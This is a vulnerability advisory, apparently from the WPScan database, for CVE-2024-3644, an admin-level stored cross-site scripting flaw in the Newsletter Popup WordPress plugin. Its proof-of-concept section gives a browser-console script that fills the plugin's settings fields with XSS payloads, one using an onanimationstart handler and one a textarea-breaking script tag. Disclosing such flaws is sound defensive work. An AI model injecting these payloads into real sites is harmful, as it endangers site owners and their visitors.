WordPress Plugin Vulnerabilities

Newsletter Popup <= 1.2 - Admin+ Stored XSS

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

Proof of Concept

1. Go to "Newsletter Popup > Add New"
2. In the browser console, enter:

```
let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' ); inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );let textareas = document.querySelectorAll( '#wpbody-content textarea' ); textareas.forEach( (element) => element.value=`</textarea><script>alert(/XSS: ${element.name}/)</script>` );
```
3. Click "Save Changes"
4. Go to "Manage Newsletters" and edit the newsletter that you added
5. See multiple XSS examples

Affects Plugins

Plugin icon
newsletter-popup
No known fix

References

CVE
CVE-2024-3644

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
10eb712a-d9c3-46c9-be6a-02811396fae8

Timeline

Publicly Published
2024-04-25 (about 25 days ago)
Added
2024-04-25 (about 25 days ago)
Last Updated
2024-04-25 (about 25 days ago)

Other

Published
Title
Published
2017-12-05
Title
WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
Published
2021-11-15
Title
Modern Events Calendar Lite < 6.1.5 - Reflected Cross-Site Scripting
Published
2023-01-23
Title
Image and Video Lightbox, Image PopUp < 2.1.6 - Admin+ Stored XSS
Published
2023-02-15
Title
Inline Tweet Sharer < 2.6 - Admin+ Stored XSS
Published
2024-03-13
Title
WPBakery Page Builder Addons by Livemesh < 3.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode